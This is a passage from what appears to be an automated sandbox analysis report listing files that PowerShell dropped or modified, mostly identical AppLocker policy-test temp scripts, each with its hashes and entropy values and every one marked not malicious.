                                    Preview:PSMODULECACHE.....$7o..z..Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script........$7o..z..T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....

                                    C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

                                    Download File
                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):64
                                    Entropy (8bit):0.34726597513537405
                                    Encrypted:false
                                    SSDEEP:3:Nlll:Nll
                                    MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                    SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                    SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                    SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                    Malicious:false
                                    Preview:@...e...........................................................

                                    C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                    Download File
                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:data
                                    Category:modified
                                    Size (bytes):2248
                                    Entropy (8bit):5.385419090103669
                                    Encrypted:false
                                    SSDEEP:48:VWSU4y4RQmFoUeWmfgZ9tK8NPVEm7u1iMuge//ZDUyu2hlheK2:VLHyIFKL3IZ2KttOugPgd2
                                    MD5:F53DE0258A1B6BBAB91C21D80E3B059B
                                    SHA1:5794C02A64C5F0ED7CADBA531FE966F3E34DAB99
                                    SHA-256:B1607713F4FDAC5D64AB8118D9511FC697886D55D5ACED74E153C52C99EAC356
                                    SHA-512:12DEF3F2A20D388DE695E0793E04EBEA9089629DFA97FEB5C4AF0020D1936149E810577501E9F99FDAB3F3274AA1454BEAD96DDF88CAEB601A13DE0441DD8AA0
                                    Malicious:false
                                    Preview:@...e................................................@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.<...............i..VdqF...|...........System.ConfigurationH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_13p1nkrg.ewu.ps1

                                    Download File
                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1xkfqpf4.yeg.ps1

                                    Download File
                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4cpvlso0.ipm.ps1

                                    Download File
                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4g3x5wsv.q01.ps1

                                    Download File
                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_as1kdyay.rex.ps1

                                    Download File
                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_askv2kvu.13g.psm1

                                    Download File
                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_baom3epz.c4o.ps1

                                    Download File
                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bpjd2ra5.vof.psm1

                                    Download File
                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_brn1hkd0.oir.psm1

                                    Download File
                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bw5o2t4g.e44.psm1

                                    Download File
                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cd1d5j4k.kqr.ps1

                                    Download File
                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cqudatba.j4u.psm1

                                    Download File
                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dnzx2egj.qe2.psm1

                                    Download File
                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dzxghbwl.yle.psm1

                                    Download File
                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ejl10khe.wyc.psm1

                                    Download File
                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_enz55n5n.wki.psm1

                                    Download File
                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_f5z0cuan.lkd.ps1

                                    Download File
                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fjmqb3xd.ldc.ps1

                                    Download File
                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jm43tpua.5q2.ps1

                                    Download File
                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_k3xukf0c.k30.psm1

                                    Download File
                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lx3oq5lv.nxe.psm1

                                    Download File
                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_m013anwn.rce.psm1

                                    Download File
                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mfzgq3xq.pkm.ps1

                                    Download File
                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_otfm0f0t.5t2.ps1

                                    Download File
                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rxazfxu5.iw3.ps1

                                    Download File
                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rxxatjss.dal.psm1

                                    Download File
                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_skocjqiw.uol.ps1

                                    Download File
                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_v5xxq3se.aq1.psm1

                                    Download File
                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vlye33uu.dlt.ps1

                                    Download File
                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
